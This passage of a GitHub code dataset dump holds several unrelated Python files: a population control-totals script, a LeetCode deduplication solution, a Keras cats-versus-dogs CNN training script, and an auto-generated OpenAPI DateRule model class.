1\n\nplt.tight_layout()\nplt.waitforbuttonpress(300000)\nplt.close()\n","repo_name":"Eivn13/Suns","sub_path":"zad2/uloha2.py","file_name":"uloha2.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44000697124","text":"import pandas as pd\nimport csv\nfrom os.path import join\n\n\ndef create_control_totals_meta(dest_folder: str):\n \"\"\"\n Create the file containing control totals for each meta region (upper level) in the project.\n\n Parameters:\n *dest_folder*(:obj:`str`): folder containing PopulationSim population files\n \"\"\"\n\n df = pd.read_csv(join(dest_folder, \"data/control_totals_taz.csv\"))\n\n hh_list = df[[\"HHBASE\", \"HHBASE1\", \"HHBASE2\", \"HHBASE4\", \"HHBASE6\"]].sum().tolist()\n\n total_pop = (\n df.sum()[\n [\n \"POPF1\",\n \"POPF2\",\n \"POPF3\",\n \"POPF4\",\n \"POPF5\",\n \"POPF6\",\n \"POPF7\",\n \"POPF8\",\n \"POPF9\",\n \"POPF10\",\n \"POPF11\",\n \"POPF12\",\n \"POPF13\",\n \"POPF14\",\n \"POPF15\",\n \"POPF16\",\n \"POPF17\",\n \"POPF18\",\n \"POPM1\",\n \"POPM2\",\n \"POPM3\",\n \"POPM4\",\n \"POPM5\",\n \"POPM6\",\n \"POPM7\",\n \"POPM8\",\n \"POPM9\",\n \"POPM10\",\n \"POPM11\",\n \"POPM12\",\n \"POPM13\",\n \"POPM14\",\n \"POPM15\",\n \"POPM16\",\n \"POPM17\",\n \"POPM18\",\n ]\n ]\n 
.sum()\n .tolist()\n )\n\n hh_list.insert(0, 1)\n hh_list.insert(1, 1)\n hh_list.insert(2, total_pop)\n\n with open(join(dest_folder, \"data/control_totals_meta.csv\"), \"w\", newline=\"\") as file:\n writer = csv.writer(file, delimiter=\",\")\n writer.writerow([\"PUMA\", \"REGION\", \"POPBASE\", \"HHBASE\", \"HHSIZE1\", \"HHSIZE2\", \"HHSIZE4\", \"HHSIZE6\"])\n writer.writerow(hh_list)\n","repo_name":"AequilibraE/tradesman","sub_path":"tradesman/model_creation/synthetic_population/create_control_totals_meta.py","file_name":"create_control_totals_meta.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"70315694566","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n idx = 0\n for i in range(len(nums)):\n if nums[i] != nums[idx]:\n idx += 1\n nums[idx] = nums[i]\n return idx + 1, nums\n\n\nif __name__ == '__main__':\n nums1 = [1, 1, 2]\n nums2 = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]\n s = Solution()\n print(s.removeDuplicates(nums1))\n print(s.removeDuplicates(nums2))","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/双指针/26_removeDuplicates.py","file_name":"26_removeDuplicates.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13704825078","text":"import os,shutil\n\ndef mkDir(path):\n\ttry:\n\t\tos.mkdir(path)\n\t\tprint('Directory created!')\n\texcept FileExistsError:\n\t\tprint('Directory already exists!')\n\nmain_path = os.path.dirname(os.path.abspath(__file__)) #path to current working directory\n\ndata_path = main_path+'/Dane.nosync/catDogs'\nbase_path = main_path+'/Dane.nosync/catDogs-small'\nmkDir(base_path)\n#Dir for partial data\ntrain_path = os.path.join(base_path, 'train')\nmkDir(train_path)\ntrain_cats_path = os.path.join(train_path, 'cats')\nmkDir(train_cats_path)\ntrain_dogs_path = os.path.join(train_path, 'dogs')\nmkDir(train_dogs_path)\n\nvalidation_path = os.path.join(base_path, 'validation')\nmkDir(validation_path)\nvalidation_cats_path = os.path.join(validation_path, 'cats')\nmkDir(validation_cats_path)\nvalidation_dogs_path = os.path.join(validation_path, 'dogs')\nmkDir(validation_dogs_path)\n\ntest_path = os.path.join(base_path, 'test')\nmkDir(test_path)\ntest_cats_path = os.path.join(test_path, 'cats')\nmkDir(test_cats_path)\ntest_dogs_path = os.path.join(test_path, 'dogs')\nmkDir(test_dogs_path)\n\n#copy first 1000 cats images to train_cats\n\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000)] \t#format inserts 'i' into the string at {}\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(train_cats_path, fname)\n\tshutil.copyfile(src, dst)\n\n#copy next 500 cats to validation_path\n\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000,1500)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(validation_cats_path, fname)\n\tshutil.copyfile(src, dst)\n\t\n#copy next 500 cats to test_cats_path\n\nfnames = ['cat.{}.jpg'.format(i) for i in range(1500,2000)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(test_cats_path, fname)\n\tshutil.copyfile(src, dst)\n\n#copy 1000 dogs to train_path\n\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000)] \t#format inserts 'i' into the string at {}\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = 
os.path.join(train_dogs_path, fname)\n\tshutil.copyfile(src, dst)\n\n#copy next 500 dogs to validation_path\n\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000,1500)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(validation_dogs_path, fname)\n\tshutil.copyfile(src, dst)\n\t\n#copy next 500 dogs to test_dogs_path\n\nfnames = ['dog.{}.jpg'.format(i) for i in range(1500,2000)] \t\nfor fname in fnames:\n\tsrc = os.path.join(data_path, 'train',fname)\n\tdst = os.path.join(test_dogs_path, fname)\n\tshutil.copyfile(src, dst)\n\t\n\n#Creating model\n\nfrom keras import models,layers\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32,(3,3), activation = 'relu', input_shape = (150,150,3) ))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Conv2D(64,(3,3), activation = 'relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Conv2D(128,(3,3), activation = 'relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Conv2D(128,(3,3), activation = 'relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation = 'relu'))\nmodel.add(layers.Dense(1, activation = 'sigmoid'))\n\nmodel.compile(optimizer = 'rmsprop' ,loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n\nprint(model.summary())\n\n#Data preprocessing (jpg->np.array) - using a generator\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\n#train_dataGen = ImageDataGenerator(rescale = 1./255)\n#test_dataGen = ImageDataGenerator(rescale = 1./255)\n\ndataGen = ImageDataGenerator(rescale = 1./255)\n\ntrain_generator = dataGen.flow_from_directory(\n\ttrain_path, \n\ttarget_size =(150,150), \n\tbatch_size = 20,\n\tclass_mode = 'binary' #binary labels\n)\n\nvalidation_generator = dataGen.flow_from_directory(\n\tvalidation_path, \n\ttarget_size =(150,150), \n\tbatch_size = 20,\n\tclass_mode = 'binary' #binary labels\n)\n\n#Note: the generator does not know when the data ends and will keep generating batches forever\n# for model.fit_generator, steps_per_epoch (or validation_steps) = numSamples/generator.batch_size\n\nhistory = model.fit_generator(train_generator, steps_per_epoch = 100, epochs = 30, validation_data = validation_generator, validation_steps = 50)\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nsteps = range(1, len(acc)+1)\n\n\nimport matplotlib.pylab as plt\n\nplt.plot(steps, acc, 'bo', label = 'train acc')\nplt.plot(steps, val_acc, 'b', label = 'val acc')\nplt.legend()\n\nplt.figure()\nplt.plot(steps, loss, 'bo', label = 'train loss')\nplt.plot(steps, val_loss, 'b', label = 'val loss')\nplt.legend()\n\nplt.show()\n","repo_name":"AndreasGerono/Keras_DLwP","sub_path":"conv_dogs_cats.py","file_name":"conv_dogs_cats.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6331387040","text":"# coding: utf-8\n\n\"\"\"\n Apteco API\n\n An API to allow access to Apteco Marketing Suite resources # noqa: E501\n\n The version of the OpenAPI document: v2\n Contact: support@apteco.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom apteco_api.configuration import Configuration\n\n\nclass DateRule(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n 
\"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'pattern_frequency': 'str',\n 'pattern_interval': 'int',\n 'pattern_type': 'str',\n 'pattern_days_of_week': 'list[str]',\n 'pattern_day_of_month': 'int',\n 'pattern_month_of_year': 'int',\n 'pattern_occurrence_of_day_in_month': 'str',\n 'start_range_limit': 'str',\n 'range_start_date': 'datetime',\n 'start_range_relative': 'str',\n 'start_range_offset_direction': 'str',\n 'start_range_offset': 'int',\n 'start_range_offset_units': 'str',\n 'end_range_limit': 'str',\n 'range_end_date': 'datetime',\n 'end_range_relative': 'str',\n 'end_range_offset_direction': 'str',\n 'end_range_offset': 'int',\n 'end_range_offset_units': 'str',\n 'range_max_occurrences': 'int'\n }\n\n attribute_map = {\n 'pattern_frequency': 'patternFrequency',\n 'pattern_interval': 'patternInterval',\n 'pattern_type': 'patternType',\n 'pattern_days_of_week': 'patternDaysOfWeek',\n 'pattern_day_of_month': 'patternDayOfMonth',\n 'pattern_month_of_year': 'patternMonthOfYear',\n 'pattern_occurrence_of_day_in_month': 'patternOccurrenceOfDayInMonth',\n 'start_range_limit': 'startRangeLimit',\n 'range_start_date': 'rangeStartDate',\n 'start_range_relative': 'startRangeRelative',\n 'start_range_offset_direction': 'startRangeOffsetDirection',\n 'start_range_offset': 'startRangeOffset',\n 'start_range_offset_units': 'startRangeOffsetUnits',\n 'end_range_limit': 'endRangeLimit',\n 'range_end_date': 'rangeEndDate',\n 'end_range_relative': 'endRangeRelative',\n 'end_range_offset_direction': 'endRangeOffsetDirection',\n 'end_range_offset': 'endRangeOffset',\n 'end_range_offset_units': 'endRangeOffsetUnits',\n 'range_max_occurrences': 'rangeMaxOccurrences'\n }\n\n def __init__(self, pattern_frequency=None, pattern_interval=None, pattern_type=None, pattern_days_of_week=None, pattern_day_of_month=None, pattern_month_of_year=None, pattern_occurrence_of_day_in_month=None, start_range_limit=None, range_start_date=None, start_range_relative=None, start_range_offset_direction=None, start_range_offset=None, start_range_offset_units=None, end_range_limit=None, range_end_date=None, end_range_relative=None, end_range_offset_direction=None, end_range_offset=None, end_range_offset_units=None, range_max_occurrences=None, local_vars_configuration=None): # noqa: E501\n \"\"\"DateRule - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._pattern_frequency = None\n self._pattern_interval = None\n self._pattern_type = None\n self._pattern_days_of_week = None\n self._pattern_day_of_month = None\n self._pattern_month_of_year = None\n self._pattern_occurrence_of_day_in_month = None\n self._start_range_limit = None\n self._range_start_date = None\n self._start_range_relative = None\n self._start_range_offset_direction = None\n self._start_range_offset = None\n self._start_range_offset_units = None\n self._end_range_limit = None\n self._range_end_date = None\n self._end_range_relative = None\n self._end_range_offset_direction = None\n self._end_range_offset = None\n self._end_range_offset_units = None\n self._range_max_occurrences = None\n self.discriminator = None\n\n if pattern_frequency is not None:\n self.pattern_frequency = pattern_frequency\n if pattern_interval is not None:\n 
self.pattern_interval = pattern_interval\n if pattern_type is not None:\n self.pattern_type = pattern_type\n if pattern_days_of_week is not None:\n self.pattern_days_of_week = pattern_days_of_week\n if pattern_day_of_month is not None:\n self.pattern_day_of_month = pattern_day_of_month\n if pattern_month_of_year is not None:\n self.pattern_month_of_year = pattern_month_of_year\n if pattern_occurrence_of_day_in_month is not None:\n self.pattern_occurrence_of_day_in_month = pattern_occurrence_of_day_in_month\n if start_range_limit is not None:\n self.start_range_limit = start_range_limit\n if range_start_date is not None:\n self.range_start_date = range_start_date\n if start_range_relative is not None:\n self.start_range_relative = start_range_relative\n if start_range_offset_direction is not None:\n self.start_range_offset_direction = start_range_offset_direction\n if start_range_offset is not None:\n self.start_range_offset = start_range_offset\n if start_range_offset_units is not None:\n self.start_range_offset_units = start_range_offset_units\n if end_range_limit is not None:\n self.end_range_limit = end_range_limit\n if range_end_date is not None:\n self.range_end_date = range_end_date\n if end_range_relative is not None:\n self.end_range_relative = end_range_relative\n if end_range_offset_direction is not None:\n self.end_range_offset_direction = end_range_offset_direction\n if end_range_offset is not None:\n self.end_range_offset = end_range_offset\n if end_range_offset_units is not None:\n self.end_range_offset_units = end_range_offset_units\n if range_max_occurrences is not None:\n self.range_max_occurrences = range_max_occurrences\n\n @property\n def pattern_frequency(self):\n \"\"\"Gets the pattern_frequency of this DateRule. # noqa: E501\n\n\n :return: The pattern_frequency of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._pattern_frequency\n\n @pattern_frequency.setter\n def pattern_frequency(self, pattern_frequency):\n \"\"\"Sets the pattern_frequency of this DateRule.\n\n\n :param pattern_frequency: The pattern_frequency of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Daily\", \"Weekly\", \"Monthly\", \"Yearly\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and pattern_frequency not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `pattern_frequency` ({0}), must be one of {1}\" # noqa: E501\n .format(pattern_frequency, allowed_values)\n )\n\n self._pattern_frequency = pattern_frequency\n\n @property\n def pattern_interval(self):\n \"\"\"Gets the pattern_interval of this DateRule. # noqa: E501\n\n\n :return: The pattern_interval of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pattern_interval\n\n @pattern_interval.setter\n def pattern_interval(self, pattern_interval):\n \"\"\"Sets the pattern_interval of this DateRule.\n\n\n :param pattern_interval: The pattern_interval of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._pattern_interval = pattern_interval\n\n @property\n def pattern_type(self):\n \"\"\"Gets the pattern_type of this DateRule. # noqa: E501\n\n\n :return: The pattern_type of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._pattern_type\n\n @pattern_type.setter\n def pattern_type(self, pattern_type):\n \"\"\"Sets the pattern_type of this DateRule.\n\n\n :param pattern_type: The pattern_type of this DateRule. 
# noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"CalculatedDay\", \"CalculatedMonth\", \"CalculatedYear\", \"Explicit\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and pattern_type not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `pattern_type` ({0}), must be one of {1}\" # noqa: E501\n .format(pattern_type, allowed_values)\n )\n\n self._pattern_type = pattern_type\n\n @property\n def pattern_days_of_week(self):\n \"\"\"Gets the pattern_days_of_week of this DateRule. # noqa: E501\n\n\n :return: The pattern_days_of_week of this DateRule. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._pattern_days_of_week\n\n @pattern_days_of_week.setter\n def pattern_days_of_week(self, pattern_days_of_week):\n \"\"\"Sets the pattern_days_of_week of this DateRule.\n\n\n :param pattern_days_of_week: The pattern_days_of_week of this DateRule. # noqa: E501\n :type: list[str]\n \"\"\"\n allowed_values = [\"None\", \"All\", \"AllWeekdays\", \"AllWeekendDays\", \"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"] # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n not set(pattern_days_of_week).issubset(set(allowed_values))): # noqa: E501\n raise ValueError(\n \"Invalid values for `pattern_days_of_week` [{0}], must be a subset of [{1}]\" # noqa: E501\n .format(\", \".join(map(str, set(pattern_days_of_week) - set(allowed_values))), # noqa: E501\n \", \".join(map(str, allowed_values)))\n )\n\n self._pattern_days_of_week = pattern_days_of_week\n\n @property\n def pattern_day_of_month(self):\n \"\"\"Gets the pattern_day_of_month of this DateRule. # noqa: E501\n\n\n :return: The pattern_day_of_month of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pattern_day_of_month\n\n @pattern_day_of_month.setter\n def pattern_day_of_month(self, pattern_day_of_month):\n \"\"\"Sets the pattern_day_of_month of this DateRule.\n\n\n :param pattern_day_of_month: The pattern_day_of_month of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._pattern_day_of_month = pattern_day_of_month\n\n @property\n def pattern_month_of_year(self):\n \"\"\"Gets the pattern_month_of_year of this DateRule. # noqa: E501\n\n\n :return: The pattern_month_of_year of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pattern_month_of_year\n\n @pattern_month_of_year.setter\n def pattern_month_of_year(self, pattern_month_of_year):\n \"\"\"Sets the pattern_month_of_year of this DateRule.\n\n\n :param pattern_month_of_year: The pattern_month_of_year of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._pattern_month_of_year = pattern_month_of_year\n\n @property\n def pattern_occurrence_of_day_in_month(self):\n \"\"\"Gets the pattern_occurrence_of_day_in_month of this DateRule. # noqa: E501\n\n\n :return: The pattern_occurrence_of_day_in_month of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._pattern_occurrence_of_day_in_month\n\n @pattern_occurrence_of_day_in_month.setter\n def pattern_occurrence_of_day_in_month(self, pattern_occurrence_of_day_in_month):\n \"\"\"Sets the pattern_occurrence_of_day_in_month of this DateRule.\n\n\n :param pattern_occurrence_of_day_in_month: The pattern_occurrence_of_day_in_month of this DateRule. 
# noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"None\", \"First\", \"Second\", \"Third\", \"Fourth\", \"Last\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and pattern_occurrence_of_day_in_month not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `pattern_occurrence_of_day_in_month` ({0}), must be one of {1}\" # noqa: E501\n .format(pattern_occurrence_of_day_in_month, allowed_values)\n )\n\n self._pattern_occurrence_of_day_in_month = pattern_occurrence_of_day_in_month\n\n @property\n def start_range_limit(self):\n \"\"\"Gets the start_range_limit of this DateRule. # noqa: E501\n\n\n :return: The start_range_limit of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_limit\n\n @start_range_limit.setter\n def start_range_limit(self, start_range_limit):\n \"\"\"Sets the start_range_limit of this DateRule.\n\n\n :param start_range_limit: The start_range_limit of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Earliest\", \"Latest\", \"Actual\", \"Relative\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_limit not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_limit` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_limit, allowed_values)\n )\n\n self._start_range_limit = start_range_limit\n\n @property\n def range_start_date(self):\n \"\"\"Gets the range_start_date of this DateRule. # noqa: E501\n\n\n :return: The range_start_date of this DateRule. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._range_start_date\n\n @range_start_date.setter\n def range_start_date(self, range_start_date):\n \"\"\"Sets the range_start_date of this DateRule.\n\n\n :param range_start_date: The range_start_date of this DateRule. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._range_start_date = range_start_date\n\n @property\n def start_range_relative(self):\n \"\"\"Gets the start_range_relative of this DateRule. # noqa: E501\n\n\n :return: The start_range_relative of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_relative\n\n @start_range_relative.setter\n def start_range_relative(self, start_range_relative):\n \"\"\"Sets the start_range_relative of this DateRule.\n\n\n :param start_range_relative: The start_range_relative of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Today\", \"Tomorrow\", \"Yesterday\", \"ThisWeek\", \"ThisMonth\", \"ThisQuarter\", \"ThisYear\", \"ThisBusinessMonth\", \"ThisBusinessQuarter\", \"ThisBusinessYear\", \"LoadDate\", \"LoadWeek\", \"LoadMonth\", \"LoadQuarter\", \"LoadYear\", \"FirstPopulatedDate\", \"FirstPopulatedWeek\", \"FirstPopulatedMonth\", \"FirstPopulatedQuarter\", \"FirstPopulatedYear\", \"LastPopulatedDate\", \"LastPopulatedWeek\", \"LastPopulatedMonth\", \"LastPopulatedQuarter\", \"LastPopulatedYear\", \"CustomDate\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_relative not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_relative` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_relative, allowed_values)\n )\n\n self._start_range_relative = start_range_relative\n\n @property\n def start_range_offset_direction(self):\n \"\"\"Gets the start_range_offset_direction of this DateRule. # noqa: E501\n\n\n :return: The start_range_offset_direction of this DateRule. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_offset_direction\n\n @start_range_offset_direction.setter\n def start_range_offset_direction(self, start_range_offset_direction):\n \"\"\"Sets the start_range_offset_direction of this DateRule.\n\n\n :param start_range_offset_direction: The start_range_offset_direction of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Forward\", \"Backward\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_offset_direction not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_offset_direction` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_offset_direction, allowed_values)\n )\n\n self._start_range_offset_direction = start_range_offset_direction\n\n @property\n def start_range_offset(self):\n \"\"\"Gets the start_range_offset of this DateRule. # noqa: E501\n\n\n :return: The start_range_offset of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._start_range_offset\n\n @start_range_offset.setter\n def start_range_offset(self, start_range_offset):\n \"\"\"Sets the start_range_offset of this DateRule.\n\n\n :param start_range_offset: The start_range_offset of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._start_range_offset = start_range_offset\n\n @property\n def start_range_offset_units(self):\n \"\"\"Gets the start_range_offset_units of this DateRule. # noqa: E501\n\n\n :return: The start_range_offset_units of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_offset_units\n\n @start_range_offset_units.setter\n def start_range_offset_units(self, start_range_offset_units):\n \"\"\"Sets the start_range_offset_units of this DateRule.\n\n\n :param start_range_offset_units: The start_range_offset_units of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Days\", \"Weeks\", \"Months\", \"Quarters\", \"Years\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_offset_units not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_offset_units` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_offset_units, allowed_values)\n )\n\n self._start_range_offset_units = start_range_offset_units\n\n @property\n def end_range_limit(self):\n \"\"\"Gets the end_range_limit of this DateRule. # noqa: E501\n\n\n :return: The end_range_limit of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_limit\n\n @end_range_limit.setter\n def end_range_limit(self, end_range_limit):\n \"\"\"Sets the end_range_limit of this DateRule.\n\n\n :param end_range_limit: The end_range_limit of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Earliest\", \"Latest\", \"Actual\", \"Forward\", \"Backward\", \"Relative\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_limit not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_limit` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_limit, allowed_values)\n )\n\n self._end_range_limit = end_range_limit\n\n @property\n def range_end_date(self):\n \"\"\"Gets the range_end_date of this DateRule. # noqa: E501\n\n\n :return: The range_end_date of this DateRule. 
# noqa: E501\n :rtype: datetime\n \"\"\"\n return self._range_end_date\n\n @range_end_date.setter\n def range_end_date(self, range_end_date):\n \"\"\"Sets the range_end_date of this DateRule.\n\n\n :param range_end_date: The range_end_date of this DateRule. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._range_end_date = range_end_date\n\n @property\n def end_range_relative(self):\n \"\"\"Gets the end_range_relative of this DateRule. # noqa: E501\n\n\n :return: The end_range_relative of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_relative\n\n @end_range_relative.setter\n def end_range_relative(self, end_range_relative):\n \"\"\"Sets the end_range_relative of this DateRule.\n\n\n :param end_range_relative: The end_range_relative of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Today\", \"Tomorrow\", \"Yesterday\", \"ThisWeek\", \"ThisMonth\", \"ThisQuarter\", \"ThisYear\", \"ThisBusinessMonth\", \"ThisBusinessQuarter\", \"ThisBusinessYear\", \"LoadDate\", \"LoadWeek\", \"LoadMonth\", \"LoadQuarter\", \"LoadYear\", \"FirstPopulatedDate\", \"FirstPopulatedWeek\", \"FirstPopulatedMonth\", \"FirstPopulatedQuarter\", \"FirstPopulatedYear\", \"LastPopulatedDate\", \"LastPopulatedWeek\", \"LastPopulatedMonth\", \"LastPopulatedQuarter\", \"LastPopulatedYear\", \"CustomDate\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_relative not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_relative` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_relative, allowed_values)\n )\n\n self._end_range_relative = end_range_relative\n\n @property\n def end_range_offset_direction(self):\n \"\"\"Gets the end_range_offset_direction of this DateRule. # noqa: E501\n\n\n :return: The end_range_offset_direction of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_offset_direction\n\n @end_range_offset_direction.setter\n def end_range_offset_direction(self, end_range_offset_direction):\n \"\"\"Sets the end_range_offset_direction of this DateRule.\n\n\n :param end_range_offset_direction: The end_range_offset_direction of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Forward\", \"Backward\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_offset_direction not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_offset_direction` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_offset_direction, allowed_values)\n )\n\n self._end_range_offset_direction = end_range_offset_direction\n\n @property\n def end_range_offset(self):\n \"\"\"Gets the end_range_offset of this DateRule. # noqa: E501\n\n\n :return: The end_range_offset of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._end_range_offset\n\n @end_range_offset.setter\n def end_range_offset(self, end_range_offset):\n \"\"\"Sets the end_range_offset of this DateRule.\n\n\n :param end_range_offset: The end_range_offset of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._end_range_offset = end_range_offset\n\n @property\n def end_range_offset_units(self):\n \"\"\"Gets the end_range_offset_units of this DateRule. # noqa: E501\n\n\n :return: The end_range_offset_units of this DateRule. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_offset_units\n\n @end_range_offset_units.setter\n def end_range_offset_units(self, end_range_offset_units):\n \"\"\"Sets the end_range_offset_units of this DateRule.\n\n\n :param end_range_offset_units: The end_range_offset_units of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Days\", \"Weeks\", \"Months\", \"Quarters\", \"Years\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_offset_units not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_offset_units` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_offset_units, allowed_values)\n )\n\n self._end_range_offset_units = end_range_offset_units\n\n @property\n def range_max_occurrences(self):\n \"\"\"Gets the range_max_occurrences of this DateRule. # noqa: E501\n\n\n :return: The range_max_occurrences of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._range_max_occurrences\n\n @range_max_occurrences.setter\n def range_max_occurrences(self, range_max_occurrences):\n \"\"\"Sets the range_max_occurrences of this DateRule.\n\n\n :param range_max_occurrences: The range_max_occurrences of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._range_max_occurrences = range_max_occurrences\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DateRule):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, DateRule):\n return True\n\n return self.to_dict() != 